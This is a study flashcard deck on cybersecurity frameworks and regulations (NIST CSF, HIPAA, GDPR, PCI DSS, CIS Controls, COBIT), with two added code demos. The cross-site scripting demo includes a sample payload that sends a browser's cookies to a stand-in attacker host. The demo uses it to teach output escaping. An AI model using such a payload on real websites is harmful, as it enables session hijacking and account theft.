S1, M1-M5 Flashcards

(175 cards)

1
Q

What does NIST stand for?

A

National Institute of Standards and Technology

2
Q

When was NIST established?

A

1901

3
Q

Why was NIST initially established?

A

to promote US innovation and industrial competitiveness by providing national measurement standards (it was founded as the National Bureau of Standards and renamed NIST in 1988)

4
Q

When did NIST branch out into cybersecurity?

A

1995

5
Q

What are the three most important NIST frameworks?

A
  1. Cybersecurity Framework
  2. Privacy Framework
  3. SP 800-53 Security and Privacy Controls for Information Systems and Organizations
6
Q

Is NIST CSF a voluntary or required framework?

A

voluntary

7
Q

What are the three primary components of the NIST CSF?

A
  1. Core
  2. Tiers
  3. Organizational Profiles
8
Q

What is the focus of the CSF Core (NIST)?

A

a taxonomy of high-level cybersecurity outcomes (Functions, broken down into Categories and Subcategories) that an organization can use to understand, manage, and reduce its cybersecurity risk

9
Q

What does the NIST CSF Core consist of?

A

six functions

10
Q

What are the six functions of the NIST CSF Core?

A

Govern, Identify, Protect, Detect, Respond, Recover

11
Q

Which of the six NIST CSF functions touches all other functions?

A

Govern (it sets the risk strategy, expectations, and policy that inform how the other five functions are carried out, so it needs oversight over all of them)

12
Q

T/F: NIST CSF Core functions represent ordered steps.

A

False. The functions are not a sequence of steps; they are meant to be performed concurrently and continuously.

13
Q

What is the focus of Identify (NIST)?

A

understand assets, risks, and improvement opportunities (AIR)

14
Q

What is the focus of Protect (NIST)?

A

secure assets to prevent or reduce the likelihood and impact of adverse cybersecurity events

15
Q

What is the focus of Detect (NIST)?

A

discover cybersecurity attacks and incidents quickly (timely)

16
Q

What is the focus of Respond (NIST)?

A

contain the effects of cybersecurity incidents

17
Q

What is the focus of Recover (NIST)?

A

restoration of company’s normal operations

18
Q

What is the key difference between Respond and Recover for NIST?

A

Respond deals with how you contain an attack and respond in real time to deal with it.
Recover deals with how you return to normal business operations after the attack has been contained.

19
Q

Is a locked door on a house a preventative or detective measure?

A

preventative (it stops an attacker from getting in)

20
Q

Is a security camera on a house a preventative or detective measure?

A

It is more traditionally a detective measure, but it can also be preventative in that it deters the attacker from wanting to rob that house.

21
Q

T/F: NIST CSF Tiers are a means to implement the six functions.

A

False. Tiers are a way of characterizing how an organization approaches cybersecurity risk; they are not an implementation method and NIST states they are not maturity levels.

22
Q

What do the NIST CSF Tiers do?

A

characterize the rigor of an organization's cybersecurity risk governance and risk management practices (how it approaches risk, not how sophisticated its security technology is)

23
Q

How many CSF Tiers are there?

A

4

24
Q

What are the four CSF Tiers?

A

Partial
Risk-Informed
Repeatable
Adaptive

25
What are the CSF Tiers further divided by?
Cybersecurity Risk Governance and Cybersecurity Risk Management
26
What does a CSF Organizational Profile do?
defines what success looks like for your unique cybersecurity needs
27
What are the two types of organizational profiles (NIST CSF)?
Current and Target
28
What is a current profile (NIST CSF)?
outcome that organization is achieving (or attempting to achieve) based on the *current cybersecurity posture*
29
What is a target profile (NIST CSF)?
*desired outcome* that organization has prioritized achieving, considering anticipated changes to its cybersecurity posture
30
What is a community profile (NIST CSF)? What are they commonly used for?
baseline outcomes developed by industry, which are used to create target profiles
31
What is the acronym to remember the 5-step approach to use Organizational Profiles to continuously improve cybersecurity posture?
Some Guy Created AI
32
What does "Some Guy Created AI" stand for (5-step approach)?
1. Scope the Organizational Profile
2. Gather the information needed to create the Organizational Profile
3. Create the Organizational Profile
4. Analyze gaps between the Current and Target Profiles and create an action plan
5. Implement the action plan and update the Organizational Profile
33
T/F: The NIST Privacy Framework was designed to be applied to any industry.
True.
34
Which functions are unique to the cybersecurity framework (NIST CSF)?
Detect, Respond, Recover
35
Which functions are unique to the NIST Privacy Framework?
Control, Communicate
36
Which functions are shared between the NIST CSF and privacy frameworks?
Govern, Identify, Protect
37
What does the Privacy Framework aim to do?
protect individuals' privacy by managing the privacy risks that arise from how their data is processed
38
What is the difference between "control" and "protect" in the NIST Privacy Framework?
Control deals with how you *manage data processing* to reduce privacy risks. Protect deals with safeguards in place to *protect data.*
39
What are the differences between NIST Organizational Profiles for the CSF and Privacy Framework?
None, they are the same.
40
What are the differences between NIST Tiers for the CSF and Privacy Framework?
None, they are the same.
41
NIST Security and Privacy Controls are the standard for what types of information security systems?
federal information systems (and the organizations that operate them or handle federal data)
42
Which of the three NIST frameworks imposes the strictest standards?
NIST Security and Privacy Controls
43
Which types of companies are more likely to use the NIST SP 800-53?
sophisticated, large companies with a large budget
44
The NIST SP 800-53 satisfies which two security and privacy requirements?
- OMB Circular A-130
- FISMA (Federal Information Security Modernization Act)
45
What are three control implementation approaches (names only)?
- Common (Inheritable)
- System-Specific
- Hybrid
46
What is the common (inheritable) control implementation approach?
implement controls across the *entire organization*
47
What is the system-specific control implementation approach?
implement controls at the information-system level
48
What is the hybrid control implementation approach?
some controls are implemented at the organizational level and others at the information-system level
49
What is a data breach?
exposure of *confidential information* to *unauthorized persons*
50
What are the two categories of data breaches?
- unintentional - intentional
51
What are the two rules under HIPAA?
Privacy Rule, Security Rule
52
The HIPAA Privacy Rule governs the privacy of what type of data?
protected health information (PHI)
53
What is a healthcare clearing house?
an institution that receives health information in one format and converts it into a standard electronic format (or vice versa), e.g. to transmit medical claims data to insurance carriers
54
You are usually a covered entity under HIPAA if you ...
handle protected health information (PHI).
55
The HIPAA Security rule specifically governs what type of PHI?
electronic
56
Under the Security rule (HIPAA), covered entities must do what three things?
- ensure the confidentiality, integrity, and availability of electronic PHI (ePHI)
- protect against reasonably anticipated threats and impermissible uses or disclosures
- ensure compliance by their workforce (e.g. through training)
57
What are three categories of safeguards under HIPAA?
Administrative, Physical, Technical
58
In what four ways did HITECH amend HIPAA? Which of these is the biggest?
- increased penalties for HIPAA violations
- required that patients be able to obtain their records in electronic form
- extended HIPAA's privacy and security obligations directly to business associates
- breach notification within 60 days of discovery (the biggest change)
59
Under GDPR, what are two of the lawful bases for processing personal data?
the data subject's consent, or processing that is necessary to comply with a legal obligation (Article 6 lists six lawful bases in total; the others are contract, vital interests, public task, and legitimate interests)
60
Are data processors that are based in the EU but actually process outside of the EU subject to GDPR?
Yes.
61
When are data processors outside of the EU subject to GDPR?
1. offering goods or services to people in the EU
2. monitoring the behavior of people in the EU
3. EU law applies by virtue of public international law (e.g. embassies)
62
What are the six principles that must be followed when processing data (GDPR)?
- Lawfulness, Fairness, and Transparency
- Purpose Limitation
- Data Minimization
- Accuracy
- Storage Limitation
- Integrity and Confidentiality
63
When is it okay to use data beyond the allowed purposes or to keep it longer than needed under GDPR?
public interest archiving, scientific or historical research, or statistical purposes
64
Data subject to the PCI DSS includes what two categories of data? Collectively, what are these two categories of data called?
- cardholder data (the information printed on the card, e.g. PAN, name, expiration date)
- sensitive authentication data (e.g. PINs/PIN blocks, full track data, card verification codes)
Together they are called "account data".
65
How often should external vulnerability scanning occur under PCI DSS?
quarterly
66
Who initially developed CIS controls? Who are they supported by now?
initially developed by an international consortium of security practitioners coordinated through the SANS Institute (the original "SANS Top 20"); now maintained and published by the Center for Internet Security (CIS)
67
What are the CIS controls?
recommended actions, processes, and best practices to strengthen cybersecurity defenses
68
The CIS controls were designed with what three principles in mind? Elaborate on these.
- Context (examples and explanations of why each control matters)
- Coexistence (align with other frameworks rather than compete with them)
- Consistency (applied uniformly across the organization)
69
What is used to tailor the implementation of CIS Controls to an organization's size?
implementation groups
70
How many implementation groups are there (CIS Controls)?
3
71
How do the three implementation groups map to the tiers for NIST?
Tiers 1 and 2 -> IG1
Tier 3 -> IG2
Tier 4 -> IG3
72
What does Control 1: Inventory and Control of Enterprise Assets entail?
understand the totality of IT assets
73
What is more sophisticated, an active or a passive asset discovery tool?
passive
74
What is DHCP logging?
DHCP is the service that hands out IP addresses to devices joining a network; DHCP logging records each lease (which MAC address received which IP, and when) so that the asset inventory can be updated and devices that were never inventoried show up
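As an added example (not part of the original deck), the script below shows what "use DHCP logging to update the inventory" looks like in practice: it parses lease acknowledgements, folds them into a per-device inventory keyed by MAC address, and flags any device that obtained an address but is not on the approved list. The log line format is modeled on ISC dhcpd's syslog output; the sample log lines and the AUTHORIZED_MACS list are constructed for the example.

```python
import re
from collections import Counter

# Lease acknowledgements in the syslog format emitted by ISC dhcpd, e.g.
#   "Mar  3 09:14:02 dhcp1 dhcpd[1203]: DHCPACK on 10.0.1.23 to aa:bb:cc:dd:ee:01 (laptop-01) via eth0"
# The hostname in parentheses is optional (devices that send none are logged without it).
ACK_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dhcpd(?:\[\d+\])?: "
    r"DHCPACK on (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"to (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: \((?P<host>[^)]*)\))? via (?P<iface>\S+)$"
)

# Constructed sample log (not from a real system). The fourth ACK is a device that
# never appeared in the asset inventory and that sends no hostname.
SAMPLE_LOG = """\
Mar  3 09:14:02 dhcp1 dhcpd[1203]: DHCPACK on 10.0.1.23 to aa:bb:cc:dd:ee:01 (laptop-01) via eth0
Mar  3 09:14:05 dhcp1 dhcpd[1203]: DHCPDISCOVER from aa:bb:cc:dd:ee:02 via eth0
Mar  3 09:14:06 dhcp1 dhcpd[1203]: DHCPACK on 10.0.1.57 to aa:bb:cc:dd:ee:02 (printer-2f) via eth0
Mar  3 11:30:41 dhcp1 dhcpd[1203]: DHCPACK on 10.0.1.88 to de:ad:be:ef:00:01 via eth0
Mar  3 12:02:10 dhcp1 dhcpd[1203]: DHCPACK on 10.0.1.24 to aa:bb:cc:dd:ee:01 (laptop-01) via eth0
""".splitlines()

# Hypothetical approved-asset list, keyed by MAC because that is the identifier DHCP sees.
AUTHORIZED_MACS = {"aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02"}


def parse_acks(lines):
    """Yield one dict per DHCPACK line; other DHCP messages (DISCOVER, REQUEST, ...) are skipped."""
    for line in lines:
        m = ACK_RE.match(line)
        if m:
            yield m.groupdict()


def build_inventory(lines):
    """Fold ACKs into a per-MAC record: current IP, hostname, last lease time, lease count.

    Later ACKs overwrite the IP on purpose: the same laptop can hold different
    addresses over a day, and the MAC is the stable key for the inventory.
    """
    inventory = {}
    leases = Counter()
    for rec in parse_acks(lines):
        leases[rec["mac"]] += 1
        inventory[rec["mac"]] = {
            "ip": rec["ip"],
            "hostname": rec["host"] or "",
            "last_seen": rec["ts"],
            "leases": leases[rec["mac"]],
        }
    return inventory


def unauthorized_devices(inventory, authorized_macs):
    """MACs that obtained a lease but are not in the approved asset list."""
    return sorted(mac for mac in inventory if mac not in authorized_macs)


if __name__ == "__main__":
    inv = build_inventory(SAMPLE_LOG)
    for mac, rec in sorted(inv.items()):
        print(mac, rec)
    print("unauthorized:", unauthorized_devices(inv, AUTHORIZED_MACS))
```

Keying on MAC rather than IP is the point of the exercise: the laptop in the sample appears with two different addresses, and a list of IPs would count it twice while missing the fact that the unknown device is the same one each time it renews. MACs can be spoofed, so this feeds the inventory rather than replacing the active and passive discovery tools the same control calls for.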
75
What does Control 2: Inventory and Control of Software Assets entail?
track and actively manage all software applications so that only authorized software is installed on company devices
76
What are allowlist authorized libraries?
ensure that only *specific files* can be loaded into a system process
77
What are allowlist authorized scripts?
ensure that only *authorized lines of code* can be executed
78
Data classification labels are assigned based on _____.
sensitivity
79
What does Control 3: Data Protection entail?
securely manage entire life cycle of data
80
What does Control 4: Secure Configuration of Enterprise Assets and Software entail?
establish and maintain secure baseline configurations for assets
81
Why are many applications sold pre-configured with default settings?
designed for ease of installation or usage
82
What is the risk of default configurations?
Attackers know the defaults (default passwords, open services, permissive settings), so any system left with its defaults is easy to find and exploit.
83
What is one of the things you should change from the default configuration?
change default passwords/logins
84
What is security hardening?
strengthening a system's defenses against cyberattacks by reducing its vulnerability
85
What does Control 5: Account Management entail?
tools to manage credentials and authorization for user accounts
86
What is a best practice regarding administrative accounts?
The end user should have *separate accounts* for regular tasks and for administrative actions, since admin accounts are more likely to be targeted for attack.
87
What does single-sign on do?
use a single log-in to authenticate across multiple applications
88
What does Control 6: Access Control Management entail?
specifying the *type of access* user accounts should have
89
What two principles should be followed when determining the level of access for a person?
1. least privilege
2. need-to-know
90
What is the key difference between account management and access control management?
Account management is about making and maintaining accounts. Access control management is about determining the level of access each account gets.
91
What does Control 7: Continuous Vulnerability Management entail?
continuously identifying and tracking vulnerabilities within infrastructure to remediate weak points
92
What is a zero-day exploit?
an attack that exploits a vulnerability the vendor does not yet know about (or has not yet patched), so no fix is available when it is first used
93
What does Control 8: Audit Log Management entail?
log management process to be alerted of and recover from an attack in real time
94
What are the two categories of logs?
1. system logs
2. audit logs
95
What are system logs? What are some examples of things recorded?
provide a list of events (start and end times, crashes, restoration)
96
What are audit logs? What are some examples of things recorded?
tied to a specific user (log in and out, access a file, open an application)
97
What does Control 9: Email and Web Browser Protections entail?
detect and protect against cybercrime attempted through email or the internet by directly engaging employees
98
What is URL filtering?
restricting access to certain websites
99
What does Control 10: Malware Defenses entail?
prevent the installation, spread, and execution of malware on company assets and the network
100
Malware is defined (broadly/narrowly).
broadly (any software designed to harm, disrupt, or misuse a computer or its data)
101
Malware frequently relies on what?
insecure end-user behavior (clicking links, opening attachments, enabling macros, installing unvetted software)
102
What should be done about software auto-run/auto-play features?
They should be disabled.
103
What is living-off-the-land?
when an attacker uses tools already present in the environment (built-in administrative utilities, scripting engines) so that malicious activity blends in with normal use instead of requiring new malware
104
What does Control 11: Data Recovery entail?
*data* backup, testing, and *restoration* processes to recover assets to a pre-incident state
105
Ideally, where should data backups be stored?
off-site in a different geographical location
106
The data backup process should be (manual/automatic).
automatic
107
What does Control 12: Network Infrastructure Management entail?
managing and securing a company's network infrastructure
108
T/F: Network Infrastructure includes only physical devices.
False, it includes virtual devices as well.
109
What can commercial tools for network infrastructure management do?
provide a *sanity check* every time a change is made to ensure that hardware/software works flawlessly
110
What does Control 13: Network Monitoring and Defense entail?
monitoring and defending a network infrastructure against internal and external security threats
111
What must the company do with respect to network monitoring and defense software solutions that are pre-purchased?
fine-tune them to the organization's needs
112
What are two of the most common ways networks can be attacked?
- Denial of Service (DoS)
- Ransomware
113
What is a Denial of Service attack?
overwhelm a company's network by flooding it with illegitimate requests, rendering it useless
114
What should be used to mitigate DoS and ransomware attacks?
event logging and alerting mechanisms
115
What is unique about network infrastructure management and network monitoring and defense in relation to the implementation groups?
These are rather advanced functions, so there are few (almost none) that apply to IG1.
116
What is the difference between Control 12 (Network Infrastructure Mangement) and Control 13 (Network Monitoring and Defense)?
Infrastructure management deals with managing the devices in your network in a secure way. Monitoring deals with detecting and responding to suspicious activity in the network.
117
Which CIS Control includes controls like collecting network traffic flow logs, managing access controls for remote assets, and centralizing security event alerting?
Network Monitoring and Defense
118
Which CIS Control includes controls like securely managing network infrastructure, ensuring network infrastructure is up-to-date, and establishing and maintaining a secure network architecture?
Network Infrastructure Management
119
What does Control 14: Security Awareness and Skills Training entail?
establish a security awareness and training program to reduce cybersecurity risk
120
What is unique about security awareness and skills training in relation to the implementation groups?
The safeguards apply to pretty much all groups; all IGs should be implementing this.
121
What does Control 15: Service Provider Management entail?
evaluate third-party service providers with access to sensitive data or responsibility for the company's IT functions
122
What does Control 16: Application Software Security entail?
manage the entire life cycle of software that is acquired, hosted, or developed in-house
123
Are software development life cycles becoming shorter or longer?
shorter
124
What is causing software development life cycles to become more complex?
They are aggregations of code from various sources.
125
What is cross-site scripting?
injecting script into a web page (through input the site echoes back without encoding it) so that the script runs in other users' browsers, e.g. to steal their sessions or act on their behalf
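To make the card concrete, here is an added example (not from the original deck) that renders the same comment two ways: by dropping the input straight into the HTML, and by encoding it first. It also shows the caveat a practitioner cares about: output encoding has to match the context, so a `javascript:` URL placed in an `href` is not stopped by entity escaping and needs scheme validation. The payload, the attacker.example domain, and the function names are constructed for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker input; attacker.example is a reserved documentation domain.
XSS_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"


def render_comment_vulnerable(username, comment):
    """Drops untrusted input straight into the page: a <script> in `comment` runs in every viewer's browser."""
    return f"<div class='comment'><b>{username}</b>: {comment}</div>"


def render_comment_safe(username, comment):
    """Same template, but <, >, & and both quote characters become entities, so the browser shows them as text."""
    return (
        f"<div class='comment'><b>{html.escape(username)}</b>: "
        f"{html.escape(comment)}</div>"
    )


ALLOWED_SCHEMES = {"http", "https"}


def safe_href(url):
    """Escaping alone does not fix an href: "javascript:alert(1)" passes through html.escape untouched.

    The scheme is validated against an allowlist first; anything else is replaced with a harmless "#".
    """
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return "#"
    return html.escape(url, quote=True)


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", XSS_PAYLOAD))
    print(render_comment_safe("mallory", XSS_PAYLOAD))
    print(safe_href("javascript:alert(1)"), safe_href("https://example.com/?a=1&b=2"))
```

In a real application this is what a templating engine's auto-escaping does for the text context; the `safe_href` check is the part auto-escaping does not do for you, and the same applies to inline event handlers and script blocks, which need their own encoding rules.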
126
What is a SQL injection?
supplying input that is concatenated into a SQL query so that it changes the query's logic, letting the attacker read, modify, or destroy data the application never meant to expose
127
What are race conditions?
when two or more processes or threads work on the same data and the result depends on which one gets there first; an attacker manipulates the timing or order of events (for example, swapping a file between the moment it is checked and the moment it is used) to produce an outcome the developer did not intend
128
When should application security be introduced in the SDLC?
as early as possible
129
What is a bug bounty program?
a program that pays people (usually outside security researchers, sometimes employees) to find and responsibly report flaws in company software
130
T/F: Application Software Security should be implemented by all implementation groups.
False, this is too advanced for IG1 to implement at all.
131
What does Control 17: Incident Response Management entail?
establish an incident response management program to detect, respond, and prepare for potential attacks
132
What is a fire drill?
testing the incident response process
133
What does Control 18: Penetration Testing entail?
test the sophistication of cybersecurity defenses by simulating actual attacks
134
How does Penetration Testing differ from Vulnerability Management?
Penetration testing goes beyond identifying weaknesses to exploit the weak points and see what damage could be done.
135
What are Red Team exercises?
penetration tests
136
How often should penetration testing occur?
at least annually
137
Should all organizations conduct penetration testing?
No, it is too advanced for IG1 (small companies).
138
What was COBIT for before it became standards for IT governance and management?
a set of standards for IT auditors
139
What is the difference between governance and management?
Governance consists of the board, which oversees the strategic direction of the company. Management manages the company on a daily basis (CEO, CFO, etc.).
140
What is a stakeholder?
anyone with a financial or business interest in the organization
141
What is the defining line between internal and external stakeholders?
Internal are the people inside the organization (board, management, employees). External are the people outside the organization.
142
COBIT 2019 was developed using what 5 things?
1. COBIT 5
2. Six Principles for a Governance System
3. Three Principles for a Governance Framework
4. Other Standards and Regulations
5. Community Contribution
143
A governance system should create value for company stakeholders by balancing what two things?
benefits and risks
144
T/F: There is no such thing as "one size fits all" in governance systems.
True.
145
What does it mean that governance frameworks should be based on a conceptual model?
They should identify *key components* as well as relationships between those components to provide greater *automation* and *maximize consistency*.
146
What is the relationship between a goal and an objective?
You set a goal first, then create objectives that can be met to help you achieve the goal.
147
In the COBIT Model, governance objectives are grouped into how many domains?
1
148
In the COBIT Model, management objectives are grouped into how many domains?
4
149
What is the single domain for governance objectives (COBIT 2019)?
evaluate, direct, and monitor (EDM)
150
What are the four management domains for management objectives (COBIT 2019)? Use the acronyms only.
APO, BAI, DSS, MEA
151
What does APO stand for (COBIT)?
align, plan, and organize
152
What is one of the most significant objectives within APO?
managed data
153
What does BAI stand for (COBIT)?
build, acquire, implement
154
What does DSS stand for (COBIT)?
deliver, service, support
155
What does MEA stand for (COBIT)?
monitor, evaluate, assess
156
What management domain touches all other domains?
MEA (monitor, evaluate, assess)
157
What are components in a governance system?
collectively or individually contribute to the *successful execution* of the governance system
158
What are the seven components to satisfy management and governance objectives (COBIT)?
1. Processes
2. Organizational Structures
3. Principles, Policies, and Frameworks
4. Information
5. Culture, Ethics, and Behavior
6. People, Skills, and Competencies
7. Services, Infrastructure, and Applications
159
What is the relationship between strategy and goals?
goals support the strategy
160
What are the four balanced scorecard dimensions?
- financial
- customer
- internal (business processes)
- learning and growth
161
What is a risk profile?
It identifies the IT-related risk the enterprise is currently exposed to and shows which areas of that risk exceed its risk appetite.
162
What are the two categories for the threat landscape?
normal or high
163
What are the three categories for compliance requirements?
low, normal, and high
164
What is low/normal/high measured relative to for compliance requirements?
relative to the industry
165
What are the four roles of IT (design factors)?
Support, Factory, Turnaround, Strategic
166
What does a support role for IT mean?
IT system is not critical for operating a business or maintaining continuity
167
What does a factory role for IT mean?
IT system will impact business operations and continuity if it fails
168
What does a turnaround role for IT mean?
drives innovation for business, but not required for critical business operations
169
What does a strategic role for IT mean?
IT system is crucial for innovation and business operations
170
What are the three technology adoption strategies?
first mover, follower, slow adopter
171
What are the four IT implementation methods?
Agile, waterfall, DevOps, hybrid
172
What are two enterprise sizes under Design Factors?
- large enterprises (more than 250 full-time employees)
- small and medium enterprises (50 to 250 full-time employees)
173
What do COBIT publications do?
give you the directions/instructions to achieve customization
174
What are the four COBIT publications to be used?
1. COBIT Framework: Introduction and Methodology
2. COBIT Framework: Governance and Management Objectives
3. COBIT Design Guide
4. COBIT Implementation Guide
175
The COBIT Implementation Guide should be used in conjunction with what other publication?
COBIT Design Guide